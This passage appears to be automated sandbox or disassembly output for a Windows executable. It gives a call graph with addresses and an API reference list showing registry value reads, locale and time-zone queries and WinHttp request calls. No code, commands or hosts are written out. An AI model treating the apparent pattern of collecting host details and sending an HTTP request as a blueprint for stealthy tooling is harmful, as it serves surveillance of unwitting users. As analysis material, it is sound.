3431 7ff6876b8760 8 API calls 3433 7ff6876b5e9b 3431->3433 3434 7ff6876b5df5 3432->3434 3435 7ff6876b7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3433->3435 3436 7ff6876b94e0 9 API calls 3434->3436 3437 7ff6876b5ed3 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3435->3437 3438 7ff6876b5e09 3436->3438 3439 7ff6876b7f40 11 API calls 3437->3439 3440 7ff6876baed0 9 API calls 3438->3440 3441 7ff6876b5efc 3439->3441 3442 7ff6876b5e27 3440->3442 3443 7ff6876b5f3d GetTimeZoneInformation memset 3441->3443 3445 7ff6876b5f38 3441->3445 3448 7ff6876b5f31 _invalid_parameter_noinfo_noreturn 3441->3448 3444 7ff6876b94e0 9 API calls 3442->3444 3446 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3443->3446 3447 7ff6876b5e36 3444->3447 3449 7ff6876bb180 _Receive_impl free 3445->3449 3450 7ff6876b5f64 3446->3450 3447->3451 3452 7ff6876b5e72 3447->3452 3454 7ff6876b5e6b _invalid_parameter_noinfo_noreturn 3447->3454 3448->3445 3449->3443 3453 7ff6876b8830 40 API calls 3450->3453 3451->3431 3455 7ff6876bb180 _Receive_impl free 3452->3455 3456 7ff6876b5f9c 3453->3456 3454->3452 3455->3451 3457 7ff6876b94e0 9 API calls 3456->3457 3458 7ff6876b5fad 3457->3458 3459 7ff6876baed0 9 API calls 3458->3459 3460 7ff6876b5fcb 3459->3460 3461 7ff6876b94e0 9 API calls 3460->3461 3462 7ff6876b5fda 3461->3462 3463 7ff6876b601b 3462->3463 3464 7ff6876b6016 3462->3464 3466 7ff6876b600f _invalid_parameter_noinfo_noreturn 3462->3466 3465 7ff6876b8760 8 API calls 3463->3465 3467 7ff6876bb180 _Receive_impl free 3464->3467 3468 7ff6876b603c 3465->3468 3466->3464 3467->3463 3469 7ff6876b7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3468->3469 3470 7ff6876b6065 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3469->3470 3471 7ff6876b7f40 11 API calls 3470->3471 3472 7ff6876b608b 3471->3472 3473 7ff6876b60cc memset 3472->3473 3474 7ff6876b60c7 3472->3474 3476 7ff6876b60c0 _invalid_parameter_noinfo_noreturn 3472->3476 3475 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3473->3475 3477 7ff6876bb180 _Receive_impl free 3474->3477 3478 7ff6876b60e6 GetModuleFileNameA 3475->3478 3476->3474 3477->3473 3479 7ff6876b94e0 9 API calls 3478->3479 3480 7ff6876b610c 3479->3480 3481 7ff6876b94e0 9 API calls 3480->3481 3482 7ff6876b611b 3481->3482 3483 7ff6876b94e0 9 API calls 3482->3483 3484 7ff6876b612a 3483->3484 3485 7ff6876b8760 8 API calls 3484->3485 3486 7ff6876b6138 3485->3486 3487 7ff6876b7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3486->3487 3488 7ff6876b6161 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3487->3488 3489 7ff6876b7f40 11 API calls 3488->3489 3490 7ff6876b6187 3489->3490 3491 7ff6876b61c8 3490->3491 3492 7ff6876b61c3 3490->3492 3494 7ff6876b61bc _invalid_parameter_noinfo_noreturn 3490->3494 3493 7ff6876b9260 11 API calls 3491->3493 3495 7ff6876bb180 _Receive_impl free 3492->3495 3496 7ff6876b61de 3493->3496 3494->3492 3495->3491 3497 7ff6876b3c40 42 API calls 3496->3497 3498 7ff6876b61e8 3497->3498 3499 7ff6876b7f40 11 API calls 3498->3499 3500 7ff6876b61f5 3499->3500 3501 7ff6876b6236 3500->3501 3502 7ff6876b6231 3500->3502 3504 7ff6876b622a _invalid_parameter_noinfo_noreturn 3500->3504 3503 7ff6876b4cb0 63 API calls 3501->3503 3505 7ff6876bb180 _Receive_impl free 3502->3505 3506 7ff6876b624c 3503->3506 3504->3502 3505->3501 3507 7ff6876b1ac0 190 API calls 3506->3507 3508 7ff6876b626f 3507->3508 3509 7ff6876b62c0 3508->3509 3511 7ff6876b9cb0 _invalid_parameter_noinfo_noreturn free 3508->3511 3510 7ff6876b62ff 3509->3510 3512 7ff6876b62fa 3509->3512 3515 7ff6876b62f3 _invalid_parameter_noinfo_noreturn 3509->3515 3513 7ff6876b634d 3510->3513 3517 7ff6876b6348 3510->3517 3520 7ff6876b6341 _invalid_parameter_noinfo_noreturn 3510->3520 3514 7ff6876b6285 3511->3514 3516 7ff6876bb180 _Receive_impl free 3512->3516 3519 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3513->3519 3518 7ff6876b62b8 3514->3518 3522 7ff6876b62b1 _invalid_parameter_noinfo_noreturn 3514->3522 3515->3512 3516->3510 3521 7ff6876bb180 _Receive_impl free 3517->3521 3523 7ff6876bb180 _Receive_impl free 3518->3523 3524 7ff6876b635e 3519->3524 3520->3517 3521->3513 3522->3518 3523->3509 3525 7ff6876bbc5c GetModuleHandleW 3524->3525 3526 7ff6876bb6ff 3525->3526 3526->3284 3526->3294 3528 7ff6876bbb32 3527->3528 3529 7ff6876bbb40 memset RtlCaptureContext RtlLookupFunctionEntry 3528->3529 3530 7ff6876bbbb6 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3529->3530 3531 7ff6876bbb7a RtlVirtualUnwind 3529->3531 3532 7ff6876bbc36 3530->3532 3531->3530 3532->3282 3534 7ff6876b9283 memcpy 3533->3534 3535 7ff6876b92c2 3533->3535 3534->3299 3653 7ff6876ba360 3535->3653 3674 7ff6876bc090 3539->3674 3543 7ff6876b429c RegOpenKeyExA 3544 7ff6876b42c8 RegGetValueA 3543->3544 3545 7ff6876b433b RegOpenKeyExA 3543->3545 3548 7ff6876b4328 RegCloseKey 3544->3548 3549 7ff6876b42fc 3544->3549 3546 7ff6876b43e1 RegOpenKeyExA 3545->3546 3547 7ff6876b4366 RegGetValueA 3545->3547 3552 7ff6876b4410 RegGetValueA 3546->3552 3553 7ff6876b44f3 3546->3553 3550 7ff6876b43ce RegCloseKey 3547->3550 3551 7ff6876b439f 3547->3551 3548->3545 3554 7ff6876b94e0 9 API calls 3549->3554 3550->3546 3555 7ff6876b94e0 9 API calls 3551->3555 3557 7ff6876b4478 RegGetValueA 3552->3557 3558 7ff6876b4449 3552->3558 3556 7ff6876b8760 8 API calls 3553->3556 3559 7ff6876b430d 3554->3559 3564 7ff6876b43b0 3555->3564 3565 7ff6876b4500 3556->3565 3562 7ff6876b44e0 RegCloseKey 3557->3562 3563 7ff6876b44b1 3557->3563 3560 7ff6876b94e0 9 API calls 3558->3560 3561 7ff6876b94e0 9 API calls 3559->3561 3567 7ff6876b445a 3560->3567 3568 7ff6876b4319 3561->3568 3562->3553 3569 7ff6876b94e0 9 API calls 3563->3569 3570 7ff6876b94e0 9 API calls 3564->3570 3566 7ff6876b7790 _Receive_impl 3 API calls 3565->3566 3571 7ff6876b4535 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3566->3571 3572 7ff6876b94e0 9 API calls 3567->3572 3573 7ff6876b94e0 9 API calls 3568->3573 3574 7ff6876b44c2 3569->3574 3575 7ff6876b43bf 3570->3575 3576 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3571->3576 3577 7ff6876b4469 3572->3577 3573->3548 3578 7ff6876b94e0 9 API calls 3574->3578 3579 7ff6876b94e0 9 API calls 3575->3579 3580 7ff6876b455b 3576->3580 3581 7ff6876b94e0 9 API calls 3577->3581 3582 7ff6876b44d1 3578->3582 3579->3550 3584 7ff6876b7f40 3580->3584 3581->3557 3583 7ff6876b94e0 9 API calls 3582->3583 3583->3562 3585 7ff6876b7f57 3584->3585 3586 7ff6876b7fb3 3585->3586 3587 7ff6876b7f71 memcpy 3585->3587 3589 7ff6876ba360 10 API calls 3586->3589 3587->3303 3590 7ff6876b7fc3 3589->3590 3590->3303 3592 7ff6876b3ecf 3591->3592 3593 7ff6876b3ef2 3591->3593 3677 7ff6876b9bb0 3592->3677 3596 7ff6876b9bb0 7 API calls 3593->3596 3595 7ff6876b3eed 3598 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3595->3598 3597 7ff6876b3f27 GetLocaleInfoA 3596->3597 3599 7ff6876b3fd4 3597->3599 3600 7ff6876b3f4d 3597->3600 3601 7ff6876b3fbb 3598->3601 3603 7ff6876b9bb0 7 API calls 3599->3603 3602 7ff6876b9bb0 7 API calls 3600->3602 3601->3312 3604 7ff6876b3f6b 3602->3604 3605 7ff6876b4001 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3603->3605 3604->3595 3606 7ff6876b3fa4 3604->3606 3608 7ff6876b41e0 _invalid_parameter_noinfo_noreturn 3604->3608 3607 7ff6876b94e0 9 API calls 3605->3607 3609 7ff6876bb180 _Receive_impl free 3606->3609 3610 7ff6876b40a5 3607->3610 3609->3595 3694 7ff6876baed0 3610->3694 3613 7ff6876b94e0 9 API calls 3614 7ff6876b40d2 3613->3614 3615 7ff6876baed0 9 API calls 3614->3615 3616 7ff6876b40f0 3615->3616 3617 7ff6876b94e0 9 API calls 3616->3617 3618 7ff6876b40ff 3617->3618 3619 7ff6876b8760 8 API calls 3618->3619 3620 7ff6876b410c 3619->3620 3621 7ff6876b7790 _Receive_impl 3 API calls 3620->3621 3622 7ff6876b4138 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3621->3622 3622->3604 3623 7ff6876b4158 3622->3623 3624 7ff6876b4188 3623->3624 3625 7ff6876b4181 _invalid_parameter_noinfo_noreturn 3623->3625 3626 7ff6876bb180 _Receive_impl free 3624->3626 3625->3624 3626->3604 3627->3321 3630 7ff6876b9510 ?good@ios_base@std@ 3628->3630 3631 7ff6876b9563 3630->3631 3639 7ff6876b9591 3630->3639 3632 7ff6876b9579 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3631->3632 3631->3639 3632->3639 3634 7ff6876b95eb ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3635 7ff6876b959b ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3634->3635 3636 7ff6876b9608 3634->3636 3637 7ff6876b56d7 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G 3635->3637 3638 7ff6876b9675 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3635->3638 3636->3635 3640 7ff6876b960d ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3636->3640 3637->3324 3638->3637 3639->3634 3639->3635 3641 7ff6876b95c5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3639->3641 3640->3635 3640->3636 3641->3635 3641->3639 3644 7ff6876b879f 3642->3644 3643 7ff6876b881f 3643->3331 3644->3643 3645 7ff6876b8817 3644->3645 3646 7ff6876b87f6 memcpy 3644->3646 3709 7ff6876ba6c0 3645->3709 3646->3331 3649 7ff6876b77ff ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3648->3649 3650 7ff6876b77a9 3648->3650 3651 7ff6876b7840 _invalid_parameter_noinfo_noreturn 3649->3651 3650->3651 3652 7ff6876bb180 _Receive_impl free 3650->3652 3652->3649 3654 7ff6876ba38e 3653->3654 3655 7ff6876ba4e2 3653->3655 3656 7ff6876ba3ee 3654->3656 3659 7ff6876ba3e1 3654->3659 3660 7ff6876ba41a 3654->3660 3673 7ff6876b1310 ?_Xlength_error@std@@YAXPEBD 3655->3673 3661 7ff6876bb188 std::_Facet_Register 3 API calls 3656->3661 3658 7ff6876ba4e7 3662 7ff6876b1270 Concurrency::cancel_current_task __std_exception_copy 3658->3662 3659->3656 3659->3658 3663 7ff6876ba403 3660->3663 3664 7ff6876bb188 std::_Facet_Register 3 API calls 3660->3664 3661->3663 3665 7ff6876ba4ed 3662->3665 3666 7ff6876ba49b _invalid_parameter_noinfo_noreturn 3663->3666 3667 7ff6876ba44e memcpy memcpy 3663->3667 3668 7ff6876ba4a2 memcpy memcpy 3663->3668 3664->3663 3666->3668 3669 7ff6876ba48e 3667->3669 3670 7ff6876ba479 3667->3670 3672 7ff6876b92d5 3668->3672 3671 7ff6876bb180 _Receive_impl free 3669->3671 3670->3666 3670->3669 3671->3672 3672->3299 3675 7ff6876b420d memset memset memset memset memset 3674->3675 3676 7ff6876b6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3675->3676 3676->3543 3678 7ff6876b9ca1 3677->3678 3679 7ff6876b9bd6 3677->3679 3708 7ff6876b1310 ?_Xlength_error@std@@YAXPEBD 3678->3708 3680 7ff6876b9be4 memcpy 3679->3680 3681 7ff6876b9bfc 3679->3681 3680->3595 3683 7ff6876b9c0d 3681->3683 3684 7ff6876b9ca6 3681->3684 3685 7ff6876b9c64 3681->3685 3686 7ff6876bb188 std::_Facet_Register 3 API calls 3683->3686 3687 7ff6876b1270 Concurrency::cancel_current_task __std_exception_copy 3684->3687 3691 7ff6876bb188 std::_Facet_Register 3 API calls 3685->3691 3692 7ff6876b9c28 memcpy 3685->3692 3689 7ff6876b9c23 3686->3689 3690 7ff6876b9cac 3687->3690 3689->3692 3693 7ff6876b9c5d _invalid_parameter_noinfo_noreturn 3689->3693 3691->3692 3692->3595 3693->3685 3696 7ff6876baf06 ?good@ios_base@std@ 3694->3696 3697 7ff6876baf3f 3696->3697 3701 7ff6876baf6d 3696->3701 3698 7ff6876baf55 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3697->3698 3697->3701 3698->3701 3700 7ff6876bafc7 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3702 7ff6876bafb7 3700->3702 3703 7ff6876baf77 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3700->3703 3701->3700 3701->3703 3706 7ff6876baf9b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3701->3706 3702->3703 3707 7ff6876bafe9 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3702->3707 3704 7ff6876bb051 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3703->3704 3705 7ff6876b40c3 3703->3705 3704->3705 3705->3613 3706->3701 3706->3702 3707->3702 3707->3703 3710 7ff6876ba7e6 3709->3710 3713 7ff6876ba6e7 3709->3713 3727 7ff6876b1310 ?_Xlength_error@std@@YAXPEBD 3710->3727 3712 7ff6876ba7eb 3715 7ff6876b1270 Concurrency::cancel_current_task __std_exception_copy 3712->3715 3713->3712 3714 7ff6876ba736 3713->3714 3717 7ff6876bb188 std::_Facet_Register 3 API calls 3714->3717 3716 7ff6876ba7f1 3715->3716 3718 7ff6876ba853 3716->3718 3728 7ff6876b9cb0 3716->3728 3719 7ff6876ba74b memcpy 3717->3719 3718->3643 3723 7ff6876ba7c4 3719->3723 3724 7ff6876ba797 3719->3724 3723->3643 3726 7ff6876bb180 _Receive_impl free 3724->3726 3725 7ff6876bb180 _Receive_impl free 3725->3718 3726->3723 3729 7ff6876b9d23 3728->3729 3730 7ff6876b9cb5 3728->3730 3729->3725 3730->3729 3731 7ff6876b9d33 _invalid_parameter_noinfo_noreturn 3730->3731 3732 7ff6876bb180 _Receive_impl free 3730->3732 3732->3730 3833 7ff6876b6660 3834 7ff6876b66b5 3833->3834 3835 7ff6876b6696 3833->3835 3838 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3834->3838 3836 7ff6876b8470 10 API calls 3835->3836 3837 7ff6876b669b 3836->3837 3837->3834 3839 7ff6876b669f fsetpos 3837->3839 3840 7ff6876b672b 3838->3840 3839->3834 3845 7ff6876b6560 3846 7ff6876b6583 3845->3846 3847 7ff6876b659f setvbuf 3846->3847 3851 7ff6876b661d 3846->3851 3848 7ff6876b65ad ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3847->3848 3847->3851 3850 7ff6876b65cf _get_stream_buffer_pointers 3848->3850 3848->3851 3849 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3852 7ff6876b664c 3849->3852 3850->3851 3851->3849 3857 7ff6876bc75e ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA 3858 7ff6876b9464 3859 7ff6876b9472 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3858->3859 3860 7ff6876b94a2 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3859->3860 3861 7ff6876b94ac 3859->3861 3860->3861 4010 7ff6876bb4dc 4011 7ff6876bb4fe 4010->4011 4012 7ff6876bb4f4 4010->4012 4013 7ff6876bb180 _Receive_impl free 4012->4013 4013->4011 3862 7ff6876b6850 3863 7ff6876b6878 3862->3863 3864 7ff6876b6869 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 3862->3864 3865 7ff6876b68f9 3863->3865 3866 7ff6876b68d9 3863->3866 3867 7ff6876b68ac memcpy 3863->3867 3864->3863 3866->3865 3868 7ff6876b68e5 fwrite 3866->3868 3867->3865 3867->3866 3868->3865 3869 7ff6876b6450 3870 7ff6876b6461 3869->3870 3871 7ff6876b649e 3869->3871 3872 7ff6876b9cb0 2 API calls 3870->3872 3873 7ff6876b646a 3872->3873 3874 7ff6876b6496 3873->3874 3876 7ff6876b64b1 _invalid_parameter_noinfo_noreturn 3873->3876 3875 7ff6876bb180 _Receive_impl free 3874->3875 3875->3871 3881 7ff6876b9aa0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 3876->3881 3879 7ff6876b64e5 3880 7ff6876b64f8 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3882 7ff6876b9b02 3881->3882 3883 7ff6876b9b77 ??1_Lockit@std@@QEAA 3882->3883 3885 7ff6876b9b19 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 3882->3885 3886 7ff6876b9b25 3882->3886 3884 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3883->3884 3887 7ff6876b64d5 ?always_noconv@codecvt_base@std@ 3884->3887 3885->3886 3886->3883 3888 7ff6876b9b3c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 3886->3888 3887->3879 3887->3880 3889 7ff6876b9b50 3888->3889 3890 7ff6876b9ba7 3888->3890 3895 7ff6876bb0c8 3889->3895 3898 7ff6876b1470 3890->3898 3894 7ff6876b9bac 3896 7ff6876bb188 std::_Facet_Register 3 API calls 3895->3896 3897 7ff6876b9b62 3896->3897 3897->3883 3901 7ff6876b1440 3898->3901 3900 7ff6876b147e _CxxThrowException __std_exception_copy 3900->3894 3901->3900 4015 7ff6876b11d0 __std_exception_destroy 4016 7ff6876b1205 4015->4016 4017 7ff6876b11f8 4015->4017 4018 7ff6876bb180 _Receive_impl free 4017->4018 4018->4016 3276 7ff6876b98d0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 4019 7ff6876b82d0 4020 7ff6876b7790 _Receive_impl 3 API calls 4019->4020 4021 7ff6876b82e4 4020->4021 4022 7ff6876b82f6 4021->4022 4023 7ff6876bb180 _Receive_impl free 4021->4023 4023->4022 4024 7ff6876bb5d0 4028 7ff6876bbcb0 SetUnhandledExceptionFilter 4024->4028 3225 7ff6876b6740 3226 7ff6876b6773 3225->3226 3233 7ff6876b67d1 3226->3233 3234 7ff6876b8470 3226->3234 3228 7ff6876b6796 3231 7ff6876b67a4 _fseeki64 3228->3231 3232 7ff6876b67bb fgetpos 3228->3232 3228->3233 3231->3232 3231->3233 3232->3233 3246 7ff6876bb160 3233->3246 3235 7ff6876b8543 3234->3235 3236 7ff6876b8493 3234->3236 3237 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3235->3237 3236->3235 3238 7ff6876b849d 3236->3238 3239 7ff6876b8552 3237->3239 3240 7ff6876b84b6 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 3238->3240 3242 7ff6876b84e1 3238->3242 3239->3228 3241 7ff6876b84dc 3240->3241 3241->3242 3245 7ff6876b8517 fwrite 3241->3245 3243 7ff6876bb160 Concurrency::cancel_current_task 8 API calls 3242->3243 3244 7ff6876b84fe 3243->3244 3244->3228 3245->3242 3247 7ff6876bb169 3246->3247 3248 7ff6876b683b 3247->3248 3249 7ff6876bb7b4 IsProcessorFeaturePresent 3247->3249 3250 7ff6876bb7cc 3249->3250 3255 7ff6876bb888 RtlCaptureContext 3250->3255 3256 7ff6876bb8a2 RtlLookupFunctionEntry 3255->3256 3257 7ff6876bb7df 3256->3257 3258 7ff6876bb8b8 RtlVirtualUnwind 3256->3258 3259 7ff6876bb780 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3257->3259 3258->3256 3258->3257 4032 7ff6876b6dc0 4033 7ff6876b6ddb 4032->4033 4034 7ff6876b6e2b ungetc 4033->4034 4035 7ff6876b6df1 4033->4035 4034->4035 4036 7ff6876bc8c0 ??1_Lockit@std@@QEAA 4037 7ff6876bc1be ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA
            APIs
              • Part of subcall function 00007FF6876B1520: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B157D
              • Part of subcall function 00007FF6876B1520: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6876B159C
              • Part of subcall function 00007FF6876B1520: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B15D0
              • Part of subcall function 00007FF6876B1520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF6876B1607
              • Part of subcall function 00007FF6876B1520: isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6876B1639
              • Part of subcall function 00007FF6876B1520: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF6876B165E
              • Part of subcall function 00007FF6876B1520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6876B168C
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B1BCC
            • memcpy.VCRUNTIME140 ref: 00007FF6876B1C1D
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B1D1F
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B1D70
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B1DC1
            • WinHttpOpen.WINHTTP ref: 00007FF6876B1DF4
            • WinHttpConnect.WINHTTP ref: 00007FF6876B1E30
            • WinHttpOpenRequest.WINHTTP ref: 00007FF6876B1E8D
            • memcpy.VCRUNTIME140 ref: 00007FF6876B1FE6
            • GetFileAttributesW.KERNELBASE ref: 00007FF6876B21C4
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B2214
            • memcpy.VCRUNTIME140 ref: 00007FF6876B2258
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B25AE
            • memcpy.VCRUNTIME140 ref: 00007FF6876B26E6
            • memcmp.VCRUNTIME140 ref: 00007FF6876B277E
            • memcpy.VCRUNTIME140 ref: 00007FF6876B2DD9
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3214
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B321B
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3222
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3229
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3230
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3237
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B323E
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3245
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B324C
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3253
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B325A
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3261
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3268
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B326F
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3276
            • memcpy.VCRUNTIME140 ref: 00007FF6876B29A8
              • Part of subcall function 00007FF6876BB188: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876BB1B8
              • Part of subcall function 00007FF6876BB188: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876BB1BE
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B3209
            • memcpy.VCRUNTIME140 ref: 00007FF6876B210C
              • Part of subcall function 00007FF6876BB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6876B1079), ref: 00007FF6876BB1A2
            • memcpy.VCRUNTIME140 ref: 00007FF6876B32D2
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3329
            • WinHttpSendRequest.WINHTTP ref: 00007FF6876B3375
            • WinHttpReceiveResponse.WINHTTP ref: 00007FF6876B3388
            • WinHttpQueryHeaders.WINHTTP ref: 00007FF6876B33BF
            • GetLastError.KERNEL32 ref: 00007FF6876B361C
              • Part of subcall function 00007FF6876B94E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B95D6
            • GetLastError.KERNEL32 ref: 00007FF6876B3414
              • Part of subcall function 00007FF6876B94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9559
              • Part of subcall function 00007FF6876B94E0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9579
              • Part of subcall function 00007FF6876B94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9589
